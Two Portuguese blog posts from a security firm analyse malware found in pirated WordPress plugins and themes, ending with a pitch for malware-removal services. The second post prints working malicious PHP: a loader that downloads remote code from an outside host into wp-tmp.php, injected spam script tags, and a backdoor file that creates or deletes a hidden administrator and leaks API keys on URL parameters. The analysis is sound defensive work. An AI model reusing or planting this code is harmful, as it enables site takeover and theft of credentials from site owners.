Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e quais os perigos que quem instala plugins e temas nulled estão correndo.

Baixamos o arquivo do plugin e antes mesmo de instalar realizamos um scan com assinturas comerciais do clamav e ja encontramos o primeiro problema:

A assinatura já nos da uma pista do malware que está nesse arquivo porém vamos analisar mais a fundo:

Em uma rápida analise o código acima faz:

• Cria um usuário administrador oculto com login fixo (default) e senha pré-definida.
• Esconde esse usuário da listagem de administradores no painel WordPress, alterando queries e contadores.
• Envia informações do site (URL e data) para um servidor externo (llllll.my).
• Injeta código malicioso em arquivos sensíveis (footer.php, functions.php, formatting.php) de todos os temas.
• Carrega código remoto de outro servidor (panel.hac…..) sempre que o site é acessado.
• Desativa cache no site para garantir que os scripts maliciosos sempre sejam executados.
• Se instala de forma persistente, dificultando a detecção e remoção.

Então resolvemos instalar o plugin e analisar o comportamento.

Após o pluign instalado o que olhamos primeiro é a tabela de usuários

Na tabela de usuários pelo wordpress não existe nenhum usuário maliciosos, mas se formos direto no banco de dados:

Isso acontece por causa desse trecho de código, que esconde o usuário no backend do wordpress:

Note que o código acima tem o usuário e a senha do user malicioso, o nível de acesso do usário e a opção para esconder o mesmo no admin bar, dificultando a vida de quem não possui um conhecimento mais técnico para remoção das infecções.

Seguindo em frente, o seguinte código foi adicionado no footer do tema, direcionando os visitantes para sites de spam, comprometendo o trafego do site, SEO e resultados de mecanismos de busca.

Por último o script envia os dados do site para um site terceiro, avisando que aquele site está sob controle do invasor:

Com isso completa-se a análise, chegando a conclusão de que nunca se deve utilizar plugins ou temas de fontes duvidosas, além de você não ter suporte para aplicação você estará entregando seu site para terceiros realizarem envio de spam, ataques a outros hosts ou hospedagem de phishing.

O post Plugins Piratas – Análise técnica apareceu primeiro em ETH SECURITY.

Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:

./wp-content/themes/twentynineteen/functions.php
./wp-content/themes/twentyseventeen/functions.php
./wp-content/themes/twentysixteen/functions.php
./wp-includes/post.php
./wp-includes/wp-tmp.php
./wp-includes/wp-vcd.php

Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:

elseif ($tmpcontent = @file_get_contents(“http://www. harors .pw/code .php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);

verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:

<script type=”text/javascript” src=”//deloplen .com/ apu.php?zoneid=2542869″ async data-cfasync=”false”></script>
<script src=”//pushqwer .com/ ntfc.php?p=2542872″ data-cfasync=”false” async></script>

Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso “O site a seguir contém conteúdo malicioso ou enganoso”.

Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.

Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:

require $_SERVER[‘DOCUMENT_ROOT’].’/wp-load.php’;
$table_name = $wpdb->get_blog_prefix();
$sample = ‘a:1:{s:13:”administrator”;b:1;}’;
if( isset($_GET[‘ok’]) ) { echo ‘<!– Silence is golden. –>’;}
if( isset($_GET[‘awu’]) ) {
$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100010010’, ‘100010010’, ‘\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.’, ‘100010010’, ‘te@ea.st’, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘100010010’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, ‘100010010’, ‘{$table_name}capabilities’, ‘{$sample}’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, ‘100010010’, ‘{$table_name}user_level’, ’10’);”); }
if( isset($_GET[‘dwu’]) ) { $wpdb->query(“DELETE FROM $wpdb->users WHERE `ID` = 100010010”);
$wpdb->query(“DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010”);}
if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘<br>’;
echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘</center></h2>’; }

Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):

| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |

Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.

Conclusão:

Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.

Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.

O post Por que não utilizar temas e plugins piratas. apareceu primeiro em ETH SECURITY.